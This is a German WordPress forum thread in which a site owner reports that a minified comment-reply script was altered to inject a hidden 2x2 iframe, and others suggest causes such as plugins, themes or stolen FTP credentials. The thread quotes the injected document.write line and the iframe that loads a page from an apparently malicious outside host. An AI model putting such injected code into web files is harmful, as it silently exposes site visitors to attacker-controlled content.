comments_replay.js.min wurde modifiziert!

  • Hallo zusammen,

    ich habe erst letzte Woche eine neue Webseite mit Wordpress (3.5.1) erstellt. Heute habe ich bemerkt das sich an der obersten Seite der Webseite ein iFrame versteckt. Dies ist aber im Browser Seitenquelltext nicht sichtbar sondern nur mit dem Firebug.

    HTML
    <iframe width="2" scrolling="auto" height="2" frameborder="no" align="middle" src="http://futomicdesigns.com/awes.html?j=1151237" name="Twitter">

    Tja, jedenfalls kommt das über die Ausgabe von wp_head. Ich vermute mal das irgendein Plugin die comments_replay.js.min modifiziert hat oder Wordpress eine Sicherheitslücke besitzt. Anderst kann ich mir das nicht erklären.

    Jedenfalls ist die originale .js Datei mit diesem Code erweitert worden:

    HTML
    document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://futomicdesigns.com/awes.html?j=1151237></iframe>');

    Ich habe um die Urzeit als die Datei geändert (laut Filezilla) worden ist das Plugin FancyBox installiert. Ob das von diesem Plugin kommt?

    Naja, bei mir ist jedenfalls alles wieder sauber. Wollte es nur mal gesagt haben ;)

    LG

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Tja, heute habe ich dieses iFrame wieder im Quelltext gefunden. Auch wurde die comments_replay.js.min wieder geändert. Weiß da keiner einen Rat was das sein könnte? Oder bin ich hier der einzigste der dieses Problem hat?

  • Hast du denn FancyBox winigstens wieder runtergeschmissen?
    Und kannst du auch die anderen Plugins ausschließen?

    [size=10]Bitte immer zuerst die Forensuche nutzen und erst danach Deine Fragen hier im Forum stellen, denn sehr vieles wurde schon mehrfach beantwortet. Bitte dabei auch die Forenregeln beachten.
    Kein Support per PN - Fragen gehören ins Forum.[/SIZE]
    [size=8]Wenn du eine weise Antwort verlangst, musst du vernünftig fragen. (Johann Wolfgang von Goethe)[/SIZE]

  • Ich habe nun alle Plugins ausprobiert. Und keines der, auch FancyBox, hat zumindest bei der Installation die datei modifiziert. Ich benutze eigentlich nur die bekannten Plugins, da müsste es ja bekannt sein falls die nicht "sauber" sind.

  • was für nen theme setzt du ein? Evtl ist auch hier die Lücke. Aktueller Virenschutz auf dem PC? Es haben sich auch schon Viren über gehackte FTP Accounts eingeschlossen

    Digitaler Rucksack Nomade

  • Ich habe mir mein eigenes Theme erstellt. Das dort ne lücke vorhanden sein soll kann ich mir schlecht vorstellen aber man weiß ja nie.
    Mein Virenscanner ist immer aktuell. Das FTP Passwort habe ich gestern vorsichthalber mal geändert.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!